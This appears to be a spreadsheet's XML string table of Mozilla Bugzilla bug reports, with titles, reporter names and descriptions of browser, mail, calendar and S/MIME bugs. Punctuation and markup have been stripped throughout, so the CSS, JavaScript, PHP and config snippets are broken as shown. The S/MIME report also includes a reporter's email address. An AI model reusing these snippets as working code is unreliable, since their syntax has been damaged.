  <si>
    <t>Can't display multiple events properly [dayview/weekview layout]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040707 Debian/1.7-5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040707 Debian/1.7-5
Hi
see the given IETF calender e.g. go to Aug 02 2004. 
Calendar has obviously problems with displaying several 
concurrent events properly. 
regards
Hadmut
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>hadmut</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-265054</t>
  </si>
  <si>
    <t>netassets.co.za - Dropdown list if  a new graph is selected the new graph does not show it appears that the new sellection is not coomunicated to the URL</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20040910
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.3) Gecko/20040910
On the drop-down list if  a new graph is selected the new graph does not show.
It appears that the new sellection is not coomunicated to the URL!
Reproducible: Always
Steps to Reproduce:
1.select graph dropdown list (Click on down arrow)
2.selct anny new graph (besides that of gold)
Actual Results:  
3.Graph does not update. (info not sent to url?)
Expected Results:  
show new graph
works fine when using microsoft ie6.1</t>
  </si>
  <si>
    <t>garyvdm</t>
  </si>
  <si>
    <t>jansmi</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-374465</t>
  </si>
  <si>
    <t>Need to install RDF MediaWiki extension (requires RAP PHP extension)</t>
  </si>
  <si>
    <t>The MediaWiki RDF extension requires the RAP API extension for PHP.  There's info on that here:
http://sites.wiwiss.fu-berlin.de/suhl/bizer/rdfapi/
Once that's installed this is what the RDF readme says to add to the
LocalSettings.php file:
  define(RDFAPI_INCLUDE_DIR /full/path/to/rdfapi-php/api/)
  require_once(extensions/Rdf.php)
I've installed the Rdf.php extension file already.</t>
  </si>
  <si>
    <t>CORE-303594</t>
  </si>
  <si>
    <t>Layout: Block and Inline</t>
  </si>
  <si>
    <t>min-width + text-align:center broken</t>
  </si>
  <si>
    <t xml:space="preserve">User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050723 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050723 Firefox/1.0.6
If .item &lt;= min-width and a parent element has the float attribute the
text-align of .item is broken. Defining text-align for the parent element fixes
it but this is illegitimate.
It happens with all versions of firefox (including deer park).
Reproducible: Always
!DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Strict//EN
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&gt;
.container
        {
        float: left
        text-align: center
        }
.item{
        float: left
        min-width: 150px
        text-align: center
      background: red
      }
      center
</t>
  </si>
  <si>
    <t>ott</t>
  </si>
  <si>
    <t>CALENDAR-241961</t>
  </si>
  <si>
    <t>Can't add more than one entry on OS/2</t>
  </si>
  <si>
    <t>On OS/2 you can only add one entry.
I tracked down the problem to icalfileset.c.
The problem is that after a write icalfileset truncates the file to the
returned size.
In the OS/2 case the returned size is smaller than the actual file because we
use 0x0A 0x0D line endings.
I tried to fix this by taking the Windows case (which should work) but the
chsize crashed for some reason (we're investigating this with the OS/2 team)
So I had to add an OS/2 specific case that did ftruncate with the results of tell.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-771139</t>
  </si>
  <si>
    <t>[l10n: kk] updated newsletter.lang file for www.mozilla.org</t>
  </si>
  <si>
    <t>Created attachment 639335
Translation of newsletter.lang
Translation of newsletter.lang</t>
  </si>
  <si>
    <t>jambooop</t>
  </si>
  <si>
    <t>CORE-428903</t>
  </si>
  <si>
    <t>There are debug information printed in release build. (nsThebesDeviceContext.cpp)</t>
  </si>
  <si>
    <t>In the terminal start up firefox trunk release build print preview something you can see some number printed out.</t>
  </si>
  <si>
    <t>leon.sha</t>
  </si>
  <si>
    <t>FIREFOX-513164</t>
  </si>
  <si>
    <t>Remove Manage Addons from Preferences UI</t>
  </si>
  <si>
    <t>This was apparently added for discoverability but just feels awkward out-of-place and takes up space.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-393410</t>
  </si>
  <si>
    <t>reftest should be able to create a (temporary) profile with appropriate prefs</t>
  </si>
  <si>
    <t>the reftest portion of the unittest suite relies on certain options being present in the profile. Currently we've been setting these up manually but we need a buildstep in buildbot to create the profile on first run. Bonus points: Destroy the profile after use.
Required profile options:
user_pref(browser.dom.window.dump.enabled true)
user_pref(browser.sessionstore.enabled false)
user_pref(javascript.options.showInConsole true)
user_pref(layout.fire_onload_after_image_background_loads true)
Currently these are being run from the default profile. If this is changed to a new profile name MozillaReftest step will have to be updated to reflect that.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-438261</t>
  </si>
  <si>
    <t>Tracking bug for Build and Release of FF3.0 RC3</t>
  </si>
  <si>
    <t>Need to do mac-only RC3 because of bug#436575. No need to do RC3 for win32 or linux.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-142226</t>
  </si>
  <si>
    <t>utwente.nl - Windows networking not supported</t>
  </si>
  <si>
    <t>Windows networking links (e.g.: \\computername\share) are not supported. dance
and my computer are on the same lan so it should work. in ie6 it does anyway.
greets thijs</t>
  </si>
  <si>
    <t>t.brilleman</t>
  </si>
  <si>
    <t>CORE-322621</t>
  </si>
  <si>
    <t>Mozilla generates broken postscript</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 ru-RU rv:1.7.8) Gecko/20050524 Fedora/1.0.4-4 Firefox/1.0.4
Build Identifier: Mozilla PostScript module (rv:1.8/2005120220)
The problem is described here:
http://bugzilla.gnome.org/show_bug.cgi?id=325919
The attached postscript file that was generated by mozilla is broken and cause troubles. The reason is:
The document is not correctly printed. By specs
postscript document must have the following layout:
......
%%BeginProlog
%%BeginResource
%%EndResource
%%EndProlog
%%BeginPage
....
But this one has:
......
%%BeginProlog
%%EndProlog
%%BeginResource
%%EndResource
%%BeginPage
....
So this document is broken that is the reason of incorrect rendering.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CALENDAR-257428</t>
  </si>
  <si>
    <t>use alarms? -- preference on a per-calendar basis</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
I would like the option to publish a calendar without publishing their alarms.
This way if you share your calender and other people view it they will not get
any of the alarm popups. This is very usefull in a business enviroment where
people will occasionally need to chech eachother's calenders. This option would
also be a usefull workaround  bug 212076 (
http://bugzilla.mozilla.org/show_bug.cgi?id=212076 ) that asks for alarm
acknowledgements everytime you refresh a remote calendar.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>s.marechal</t>
  </si>
  <si>
    <t>THUNDERBIRD-244800</t>
  </si>
  <si>
    <t>Minor menu item re-organization</t>
  </si>
  <si>
    <t>The new extensions manager stuff moves Themes and Extensions out of the Options
dialog and into menu items under Tools. 
Our tools menu is getting awfully big. We need to make some room to add these
two items.
I'd like to move the items for search AB and searches messages away from this
menu. Taking a tip from mail.app moving these items to a fly out from the find
menu: 
Edit 
   Find ---&gt; Search Messages
             Search Addresses
             ---------------
             Find
             Find Next
             Find Previous
Themes and Extensions now moves into Tools and eventually we make room for Going
to the address book in here as well.</t>
  </si>
  <si>
    <t>JSS-345130</t>
  </si>
  <si>
    <t>JSS</t>
  </si>
  <si>
    <t>JSS error codes are not up to date with NSS</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/security/source/security/jss/org/mozilla/jss/util/errstrings.c#66
JSS private headers files 
mozilla/security/jss/org/mozilla/jss/util/SSLerrs.h
mozilla/security/jss/org/mozilla/jss/util/SECerrs.h
mozilla/security/jss/org/mozilla/jss/util/NSPRerrs.h
need to be updated to be the same as
/mozilla/security/nss/cmd/lib/SSLerrs.h
/mozilla/security/nss/cmd/lib/SECerrs.h
/mozilla/security/nss/cmd/lib/NSPRerrs.h</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-515933</t>
  </si>
  <si>
    <t>mpt-vpn is slow and sometimes completely useless since this morning</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #515666 +++
I'm seeing this issue again and catlee confirmed.</t>
  </si>
  <si>
    <t>FIREFOX-327036</t>
  </si>
  <si>
    <t>OS Bookmarks menu nonfunctional</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20060131 Firefox/1.5
None of the items in the OS's Bookmarks menu in the app's main menubar work.  Plain bookmarks don't go anywhere folders show a hierarchical arrow but don't expand.
Reproducible: Always
Steps to Reproduce:
1. Launch Firefox
2. Open Bookmarks menu from app menubar
3. Choose one of the bookmarks or bookmark folders
Actual Results:  
Nothing happens.  If a bookmark is chosen it blinks and the menu goes away but that's all.  Hierarchical menus (folders) are completely unresponsive doing nothing but highlighting on mouseover.
Expected Results:  
Folders expand hierarchically.  Bookmarks go to websites.
This is the 20060131 Places build posted as the 20060128 nightly.</t>
  </si>
  <si>
    <t>annie.sullivan</t>
  </si>
  <si>
    <t>pamg.bugs</t>
  </si>
  <si>
    <t>CORE-67451</t>
  </si>
  <si>
    <t xml:space="preserve">Bug when  is used in </t>
  </si>
  <si>
    <t xml:space="preserve">    
    F       
    3   is used --&gt;
    2
  </t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-486108</t>
  </si>
  <si>
    <t>Need to set a new LDAP password old one expired</t>
  </si>
  <si>
    <t>So I was away for too long and now my password expired and I can't log into the reset page because of that.
Please help :)</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-311433</t>
  </si>
  <si>
    <t>venkman takes a very long time to load if you've visited very long data urls</t>
  </si>
  <si>
    <t>i have a system which is loading data urls that are 70k long probably at least 
one per minute for hours. most data urls contain a  tag which means 
that when venkman tries to start it spends forever considering this expression:
var ary = e.scriptInstance.url.match (/(.*)venkman-service\.js$/)
i'm not sure what this code was /trying/ to do but it looks like it can be 
abused by a silly web page and i think that it can be improved to be a lot 
faster for my edge case.</t>
  </si>
  <si>
    <t>FIREFOX-411775</t>
  </si>
  <si>
    <t>Firefox Companion for eBay addon not available/working for Firefox 3.5</t>
  </si>
  <si>
    <t>https://addons.mozilla.org/firefox/5202/</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-410670</t>
  </si>
  <si>
    <t>Socorro (crash-reports.m.c) takes very long to return search results for a query</t>
  </si>
  <si>
    <t>To reproduce:
1. Go to http://crash-stats.mozilla.com select the product Firefox and search for _cairo_surface_acquire_dest_image (or just click the URL :)
2. Wait and wait and ...
Maybe you get a result after a few minutes (more likely with a smaller product like SeaMonkey) but it can also happen that you will still be waiting after &gt;5 minutes for a result.</t>
  </si>
  <si>
    <t>SEAMONKEY-149388</t>
  </si>
  <si>
    <t>mozilla-js.pc doesn't -DXP_UNIX in CFLAGS</t>
  </si>
  <si>
    <t>Per the summary mozilla-js.pc is missing -DXP_UNIX from CFLAGS.</t>
  </si>
  <si>
    <t>CORE-514007</t>
  </si>
  <si>
    <t>titlebar pops over window when switching orientation on HTC touch pro</t>
  </si>
  <si>
    <t>CORE-439276</t>
  </si>
  <si>
    <t>Silent script termination when calling atob() with illegal input in JS component</t>
  </si>
  <si>
    <t>Calling atob() with an illegal argument from a JavaScript component leads to a weird silent code interruption.
While the same call atob() from a DOM Window throws an exception if the context is a JS component the code exits with *no exception thrown* and *no crash*. It apparently just stop executing making error handling or predictable execution impossible.
Should further analysis show this can happen with other JS APIs JavaScript components should be considered very unreliable all at once.
This may also have security implications.
Notice that this happens on Gecko 1.9 and above only. Firefox 2 behaves as expected throwing an exception no matter if the global object is a DOM Window or not.
Step to reproduce:
1. Install the AdBlock Plus extension https://addons.mozilla.org/en-US/firefox/addon/1865
2. Open Tools|Error Console
3. Evaluate the following code line:
try { atob(/) } catch(e) { alert(e) } try { alert(Components.classes[@mozilla.org/adblockplus1] .createInstance().wrappedJSObject.__parent__.eval('atob(/)')) } catch(e) { alert(e) } alert(Done!)
Expected result:
You should see 3 alerts first 2 with error reports and the last saying Done!
Actual result:
Only the first error alert is displayed. Code aborts abruptly with no error message but the browser keeps running.
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008060607 Minefield/3.0pre
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.1a1pre) Gecko/2008061011 Minefield/3.1a1pre</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-420830</t>
  </si>
  <si>
    <t>Expose mime_create() to content type handler plugins</t>
  </si>
  <si>
    <t>Created attachment 307173
patch
I'm working on a mime content handler (packaged as a thunderbird extension) which needs to call mime_create(content_type hdrs opts).
The problem is that mailnews doesn't expose this method through nsIMimeObjectClassAccess.h
When I statically link mime_s.a with the extenstion I can call mime_create but I get an object that has wrong superclass (children have wrong superclass too).
I have a patch for mailnews module which exposes mime_create().
Would it be possible to integrate it in future thunderbird releases ?
I hope it doesn't cause any security problems.
Patch coming ...</t>
  </si>
  <si>
    <t>jvarga</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-502351</t>
  </si>
  <si>
    <t>Info on file locations for Mac OS X is old for profile management</t>
  </si>
  <si>
    <t>Created attachment 386810
diff file of changes to the web page created using the online web page editing interface
Locations have changed for the profile and also the name of the executable has changed at least as of OS X 10.5.7:
Old:
/Applications/Thunderbird.app/Contents/MacOS/thunderbird
New:
/Applications/Thunderbird.app/Contents/MacOS/thunderbird-bin
Old:
~/Library/Application Support/Thunderbird/
New:
~/Library/Thunderbird/
See attached diff file created using the online web page editing interface.</t>
  </si>
  <si>
    <t>benjamingslade+mozilla</t>
  </si>
  <si>
    <t>JSS-312774</t>
  </si>
  <si>
    <t>Support for IBM JDK on Linux</t>
  </si>
  <si>
    <t>We need to make some changes to JSS in order to
build it under IBM's JDK
(http://www.ibm.com/developerworks/java/jdk/).
IBM's JDK is available on AIX Linux and z/OS.
This bug is only concerned with Linux.</t>
  </si>
  <si>
    <t>FIREFOX-448922</t>
  </si>
  <si>
    <t>Text in location bar overflows its content box</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.1) Gecko/2008070206 Firefox/3.0.1
I've been trying to increase the font size in the URL bar.  I created a userChrome.css file with the following:
#urlbar {
   font-family: monospace !important
   font-size: 18 pt !important
}
The font family was changed to monospace (indicating that this is the correct CSS identifier for the URL bar) but the font size wasn't changed.
Reproducible: Always
Steps to Reproduce:
1. Edit the userChrome.css file as described above.
2. Restart Firefox.
3. Gaze in wonder at the unchanged font size in the URL bar.
Actual Results:  
The font size does not change.
Expected Results:  
The font size should increase to the specificed size.</t>
  </si>
  <si>
    <t>mvanier</t>
  </si>
  <si>
    <t>CORE-519901</t>
  </si>
  <si>
    <t>delete node.prop gives Security Manager vetoed action (XPCNativeWrapper)</t>
  </si>
  <si>
    <t>On 9/30/09 12:55 AM John J. Barton wrote:
&gt; I hit a problem I get an error message Security Manager vetoed action
&gt; with the line number point to:
&gt; delete node.__walkingAnonymousChildren // unmark looping
&gt; Here node is in an nsIDOMDocumentXBL document loaded in a content
&gt; browser.
I assume |node| is just something that looks like a DOM node to you (as in you didn't do wrappedJSObject on it or anything?
If so looks like the issue is that XPC_NW_DelProperty will throw NS_ERROR_XPC_SECURITY_MANAGER_VETO in general when touching content from chrome.  Not sure why that code is as it is this was part of the initial XPCNativeWrapper landing.  Looks wrong to me worth filing a bug on and ccing :jst and brendan@moz and probably mrbkap and :bz. Minimal-ish testcase:
javascript: var foo = new XPCNativeWrapper(document.body) foo.bar = 'x' delete foo.bar
Of course I'm not quite sure why you need the __walkingAnonymousChildren thing at all... Why do you need it?
-Boris</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-522489</t>
  </si>
  <si>
    <t>This webpage points to an outdated version of the nightly trunk builds.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.6 en-US rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Build Identifier: 
The page incorrectly points to:
http://ftp.mozilla.org/pub/mozilla/nightly/latest-trunk
for nightly trunk builds. This folder is from 2005 and should be replaced by:
http://ftp.mozilla.org/pub/mozilla.org/mozilla.org/firefox/nightly/latest-trunk/
Reproducible: Always</t>
  </si>
  <si>
    <t>IDontUseMozillaAnyMore</t>
  </si>
  <si>
    <t>TOOLKIT-443037</t>
  </si>
  <si>
    <t>basetext doesn't claim to implement nsIDOMXULLabeledControlElement</t>
  </si>
  <si>
    <t>Created attachment 327688
Add implements
The interface is implemented but the binding doesn't claim to do so. This breaks accessibility for certain nodes where the accessible name should be read from the label instead of its child nodes.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-468439</t>
  </si>
  <si>
    <t>Bouncer not showing mirror uptake for multiple 3.1b2 products</t>
  </si>
  <si>
    <t>Linux builds and both mac and linux partials are showing 0% uptake in bouncer. I've triple-checked the entries for them and they are definitely OK. I can see these files on some of the mirrors eg:
http://ftp-atl.osuosl.org/pub/mozilla.org/firefox/releases/3.1b2/linux-i686/en-US/firefox-3.1b2.tar.bz2
It kindof looks like Bouncer is just incorrect but I'm not sure. FTP Lag (https://nagios.mozilla.org/ftplag/) is mostly fine.</t>
  </si>
  <si>
    <t>CORE-463645</t>
  </si>
  <si>
    <t>container-live object attribute should reflect role as well</t>
  </si>
  <si>
    <t>We expose the computed politeness (aria-live) value for any given node via container-live.
This is calculated here:
http://mxr.mozilla.org/mozilla-central/source/accessible/src/base/nsAccUtils.cpp#278
It should really check the current role as it traverses the tree. The following roles have a default aria-live property value:
timer: off
log: polite
status: polite
marquee: off</t>
  </si>
  <si>
    <t>THUNDERBIRD-276918</t>
  </si>
  <si>
    <t>menubar missing unable to view account info or mail</t>
  </si>
  <si>
    <t>found using 2005010304-trunk tbird on Linux fedora core 2.
the trunk build is horked: I can launch it create a new account (I tried this
using a fresh profile) but there are a lot of problems:
a. no menubar (no menus).
b. folder and thread/message panes are blank (unable to view account or mail).
could this be due to the aviary landing? (couldn't find existing bugs so far.)
not a problem on Mac OS X.
marcia or tracy when the Windows build is available could you see how that
behaves? thanks!</t>
  </si>
  <si>
    <t>CALENDAR-488720</t>
  </si>
  <si>
    <t>Recurrence dialog doesn't work well when editing an event with monthly rule The last day of the month</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 it-IT rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090415 Lightning/1.0pre090415 Shredder/3.0b3pre
Edit recurrence dialog allows to set an event with monthly rule The last day of the month but when you edit it the dialog doesn't set properly all the controls and doesn't show the rule.
Reproducible: Always
Steps to Reproduce:
1. create a new event
2. select repeat custom
3. select recurrence pattern monthly and The last + Day of the month
4. close the dialog
5. click on the recurrence summary text displaying the recurrence rule
Actual Results:  
the edit recurrence dialog shows drop down menu (ordinal and weekday) disabled and daypicker enabled but without days selected i.e. no visual indication that the rule is the last day of the month
Expected Results:  
the dialog should show dropdown menu enabled with the options The last and Day of the month and daypicker should be disabled.
It doesn't work with Lightning 0.9 too but the result is different (the dialog shows monthly but the other controls belongs to daily rule).</t>
  </si>
  <si>
    <t>CORE-330046</t>
  </si>
  <si>
    <t>Cannot Copy SVG Text</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
As per the SVG Spec you must be able to copy text in an SVG (for accessibility among other reasons). In MozSVG's implementation you cannot copy text. This may be a function of the inability to select text or search for text or it may not.
Note that this is different than the ability to select text or the abilty to find text using the search facility for which I will file separate bugs.
Reproducible: Always
Steps to Reproduce:
1. Load sample file
2. Try to search for a string that appears in both HTML and SVG and cycle to an SVG instance of the matching string
3. If seemingly successful attempt to copy
Actual Results:  
Text string is not copied to the clipboard.
Expected Results:  
Text string should be copied to the clipboard.
This is very important for accessibility and for many WebApps.</t>
  </si>
  <si>
    <t>CORE-484297</t>
  </si>
  <si>
    <t>[Mac] nsIFile target doesn't do the right thing</t>
  </si>
  <si>
    <t>It handles Mac aliases but not symbolic links.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-323640</t>
  </si>
  <si>
    <t>My extension not listed as mine  request to change it's ownership</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8) Gecko/20051211 Fedora/1.5-1fnx Firefox/1.5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8) Gecko/20051211 Fedora/1.5-1fnx Firefox/1.5
I've tried a couple of times to upload the latest version of my URL Link extension (URL as listed in report above) as it's now 1.5 compatable and I keep getting requests to fix it but with the new addons schema all I get is:
ERROR!! This extension does NOT belong to the author logged in.
Terminating...
I guess this is because it was inserted by a dev. using the old mechanism.  Could you please re-assign ownership 'back' to me (addons ref. Neil Bird mozilla@fnxweb.com) so's I can update it?
There's an unacknowledged generic bug on this somewhere in addons but I'm starting to get more and more 'please fix' emails/comments so I'd appreciate this being fixed.
Reproducible: Always
Steps to Reproduce:
1. Try to upload my new xpi file.
Actual Results:  
Get reported error.
Expected Results:  
Some form of 'it worked' message I guess.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-522844</t>
  </si>
  <si>
    <t>Stop depending on the incorrect behavior of inDeepTreeWalker::parentNode</t>
  </si>
  <si>
    <t>I'd like to fix that behavior and not break DOMi in the process.
I did test that the new code works.  )</t>
  </si>
  <si>
    <t>THUNDERBIRD-297776</t>
  </si>
  <si>
    <t>downloading messages for offline use doesn't work with Google Desktop Search</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Try to download messages for offline use from an IMAP server (UW-IMAP 2004d). 
The  messages are copied to the local drive.  But when I try to read them in
offline mode I get the body of this message has not been downloaded...
Reproducible: Always
Steps to Reproduce:
1. removed Thunderbird directory in Application Data
2. clean standard installation of TBird 1.0.2
3. create new profile don't import anything
4. create new email account (linked to acct on UW-IMAP 2004d server)
5. turn off adaptive junk mail (or don't same result either way)
6. connect to server get INBOX headers
7. read a messsage online... works OK
8. Tools/Account Settings/Offline: make messages in Inbox available = ON
9. File/Offline/DownloadSyncNow
   sync mail messages ON
   work offline after download ON
   Select INBOX and one other IMAP folder for downloading
   Result:
     TBird downloads contents of INBOX
     TBird downloads contents of Folder2
     TBird downloads contents of INBOX *again*.  The local disk file
     is now twice the size of the inbox file on the IMAP server
10. Now working offline... try to read a message in INBOX
    Result: the body of this message has not been downloaded
Actual Results:  
Messages are not available in offline mode.
TBird downloads the entire contents of folders at each download.
Mail folders on the local drive get bigger and bigger.
Compact folders has no effect.
Expected Results:  
Messages should be available offline.
Only new messges should be downloaded.</t>
  </si>
  <si>
    <t>sar</t>
  </si>
  <si>
    <t>BUGZILLA-164307</t>
  </si>
  <si>
    <t>CGI.pl not localisable</t>
  </si>
  <si>
    <t>CGI.pl uses fixed strings for the UI such as the prompt that it needs a 
legitimate e-mail address and password to continue and the labeling of the E-
mail address and Password fields.  These should be templatized.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-525400</t>
  </si>
  <si>
    <t>Outages page has a 404 to bitgravity.com</t>
  </si>
  <si>
    <t>Remember bitgravity?  good times!
http://status.mozilla.com/en-US/outages.html
is trying to include a 404:
http://bitcast-a.v1.sjc1.bitgravity.com/mozilla/outages/img/__utm.gif?utmwv=6.1&amp;utmn=70250685&amp;utmsr=1920x1200&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=0&amp;utmjv=1.5&amp;utmfl=10.0%20r32&amp;utmdt=Service%20Outages&amp;utmhn=status.mozilla.com&amp;utmr=-&amp;utmp=/en-US/outages.html</t>
  </si>
  <si>
    <t>THUNDERBIRD-304473</t>
  </si>
  <si>
    <t>bump Thunderbird version on Mozilla 1.8 branch to 1.4</t>
  </si>
  <si>
    <t>Bump Thunderbird version on Mozilla 1.8 branch to 1.4.</t>
  </si>
  <si>
    <t>CORE-372036</t>
  </si>
  <si>
    <t>Stop calling UpdateView in UpdateViewsForTree</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/seamonkey/source/layout/base/nsCSSFrameConstructor.cpp#9537
Calling UpdateView could have negative implications for performance because it goes through the view code rather than the frame invalidation code.
The other idea I have for something that might help perf back involves restoring some of the code I removed in bug 371460.  If changing this doesn't help significantly I'll try that.
I'll have the patch in the next few days.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-292725</t>
  </si>
  <si>
    <t>MIPs should apply to the context node for unrolled repeat rows</t>
  </si>
  <si>
    <t>If f.x. the context node for a repeat row is disabled the entire row should
match :disabled. As in:
    v1
    v2
  There it is: 
Here the entire  (or rather the surrounding div of the contextcontainer)
should match :disabled.</t>
  </si>
  <si>
    <t>DOCUMENTATION_GRAVEYARD-120592</t>
  </si>
  <si>
    <t>Need documentation on DOM Range</t>
  </si>
  <si>
    <t>I think domref should include documentation on *all* supported interfaces - and
DOM Range is (buggy or not) implemented imo.
(also should be blocker for bug 93108)</t>
  </si>
  <si>
    <t>oeschger</t>
  </si>
  <si>
    <t>luolong</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-256851</t>
  </si>
  <si>
    <t>Security: S/MIME</t>
  </si>
  <si>
    <t>Mozilla creates/verifies invalid S/MIME signatures on 8bit mails because of RFC Violation (need to convert to Quoted Printable first)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1) Opera 7.23  [en]
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) Gecko/20040803
Mails with a Content-Transfer-Encoding of 8bit created by mozilla (latest 
version) will have an invalid signature on the recipients end because mozilla 
(smime component) does not convert the original content into 7bit/quoted 
printable PRIOR signing.
If the setting -&gt; Edit-&gt;Preference-&gt;Mail &amp; Newsgroups-&gt;Composition-&gt;For 
Messages that contain 8bit characters use 'quoted printable' MIME encoding
is activated - mails will have a valid signature.
If this setting is however deactivated (meaning you create 8bit mails) - 
signatures are invalid. (NOTE : You have to create a mail with 8bit characters 
i.e. german umlauts)
Mail created my mozilla 1.7.2 with invalid signature in my sent folder (this 
mail will be verified OK by mozilla but thats another BUG see details) :
From - Wed Aug 25 14:31:42 2004
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00800000
Message-ID: 
Date: Wed 25 Aug 2004 14:31:42 +0200
From: Rene Gawanka 
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) 
Gecko/20040803
X-Accept-Language: en-us en
MIME-Version: 1.0
To:  r.gawanka@c1-sec.com
Subject: 8bit mail signed with mozilla [invalid signature]
X-Enigmail-Version: 0.85.0.0
X-Enigmail-Supports: pgp-inline pgp-mime
Content-Type: multipart/signed protocol=application/x-pkcs7-signature 
micalg=sha1 boundary=------------ms010801010701090101020501
This is a cryptographically signed message in MIME format.
--------------ms010801010701090101020501
Content-Type: text/plain charset=ISO-8859-1 format=flowed
Content-Transfer-Encoding: 8bit
Test Ã¤Ã¶Ã¼
--------------ms010801010701090101020501
Content-Type: application/x-pkcs7-signature name=smime.p7s
Content-Transfer-Encoding: base64
Content-Disposition: attachment filename=smime.p7s
Content-Description: S/MIME Cryptographic Signature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--------------ms010801010701090101020501--
The mail is marked as valid in my sent folder but on the recieving site - its 
marked as invalid - because 8bit will be converted to 7bit quoted printable on 
many MTAs - here is the result :
Message-ID: 
Date: Wed 25 Aug 2004 14:31:42 +0200
From: Rene Gawanka 
To: r.gawanka@c1-sec.com
Subject: 8bit mail signed with mozilla [invalid signature]
Content-Type: multipart/signed protocol=application/x-pkcs7-signature 
micalg=sha1 boundary=------------ms010801010701090101020501
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) 
Gecko/20040803
X-Accept-Language: en-us en
MIME-Version: 1.0
X-Enigmail-Version: 0.85.0.0
X-Enigmail-Supports: pgp-inline pgp-mime
X-MIMETrack: Itemize by SMTP Server on domino/bonelabs(Release 6.0|September 26 
2002) at
 08/25/2004 14:42:06Serialize by Router on domino/bonelabs(Release 6.
0|September 26 2002) at
 08/25/2004 14:42:06Serialize complete at 08/25/2004 14:42:06Itemize by Router 
on domino/bonelabs(Release 6.0|September 26 2002) at 08/25/2004
 14:42:06
--------------ms010801010701090101020501
Content-Type: text/plain charset=ISO-8859-1 format=flowed
Content-Transfer-Encoding: quoted-printable
Test =E4=F6=FC
--------------ms010801010701090101020501
